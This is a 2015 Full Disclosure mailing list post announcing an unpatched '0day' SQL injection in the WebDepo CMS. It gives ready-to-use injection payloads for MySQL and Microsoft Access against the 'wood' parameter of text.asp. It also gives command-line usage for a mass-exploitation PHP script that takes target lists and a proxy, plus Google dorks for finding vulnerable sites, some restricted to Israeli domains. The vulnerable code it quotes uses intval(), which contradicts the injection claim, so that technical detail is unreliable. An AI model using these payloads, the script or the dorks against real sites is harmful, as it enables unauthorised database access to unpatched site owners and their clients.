[prev in list] [next in list] [prev in thread] [next in thread]
List: full-disclosure
Subject: [FD] (0DAY) WebDepo -SQL injection / INURL BRASIL
From: INURL Brasil <inurlbr () gmail ! com>
Date: 2015-03-28 5:16:38
Message-ID: CANogS9jsAfdOabHtbZrMfesj+TbU1N=aZ-9C7o4Y6w=JUsbfJw () mail ! gmail ! com
[Download RAW message or body]
Advisory: SQLi-vulnerabilities in aplication CMS WebDepo
Affected aplication web: Aplication CMS WebDepo (Release date: 28/03/2014)
Vendor URL: http://www.webdepot.co.il
Vendor Status: 0day
==========================
Vulnerability Description:
==========================
Records and client practice management application
CMS WebDepo suffers from multiple SQL injection vulnerabilitie
==========================
Technical Details:
==========================
SQL can be injected in the following GET
GET VULN: wood=(id)
$wood=intval($_REQUEST['wood'])
==========================
SQL injection vulnerabilities
==========================
Injection is possible through the file text.asp
Exploit-Example:
DBMS: 'MySQL'
Exploit: +AND+(SELECT 8880 FROM(SELECT
COUNT(*),CONCAT(0x496e75726c42726173696c,0x3a3a,version(),(SELECT (CASE
WHEN (8880=8880) THEN 1 ELSE 0 END)),0x717a727a71,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
DBMS: 'Microsoft Access'
Exploit:
+UNION+ALL+SELECT+NULL,NULL,NULL,CHR(113)&CHR(112)&CHR(120)&CHR(112)&CHR(113)&CHR(85)&CHR(116)& \
CHR(106)&CHR(110)&CHR(108)&CHR(90)&CHR(74)&CHR(113)&CHR(88)&CHR(116)&CHR(113)&CHR(118)&CHR(111)& \
CHR(100)&CHR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL
FROM MSysAccessObjects%16
Ex: http://target.us/text.asp?wood=(id)+Exploit
==========================
SCRIPT EXPLOIT
==========================
http://pastebin.com/b6bWuw7k
--help:
-t : SET TARGET.
-f : SET FILE TARGETS.
-p : SET PROXY
Execute:
php WebDepoxpl.php -t target
php WebDepoxpl.php -f targets.txt
php WebDepoxpl.php -t target -p 'http://localhost:9090'
howto: http://blog.inurl.com.br/2015/03/0day-webdepo-sql-injection.html
==========================
GOOGLE DORK
==========================
inurl:"text.asp?wood="
site:il inurl:"text.asp?wood="
site:com inurl:"text.asp?wood="
==========================
Solution:
==========================
Sanitizing all requests coming from the client
==========================
Credits:
==========================
AUTOR: Cleiton Pinheiro / Nick: googleINURL
Blog: http://blog.inurl.com.br
Twitter: https://twitter.com/googleinurl
Fanpage: https://fb.com/InurlBrasil
Pastebin http://pastebin.com/u/Googleinurl
GIT: https://github.com/googleinurl
PSS: http://packetstormsecurity.com/user/googleinurl
YOUTUBE: http://youtube.com/c/INURLBrasil
PLUS: http://google.com/+INURLBrasil
==========================
References:
==========================
[1] http://blog.inurl.com.br/2015/03/0day-webdepo-sql-injection.html
[2] https://msdn.microsoft.com/en-us/library/ff648339.aspx
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic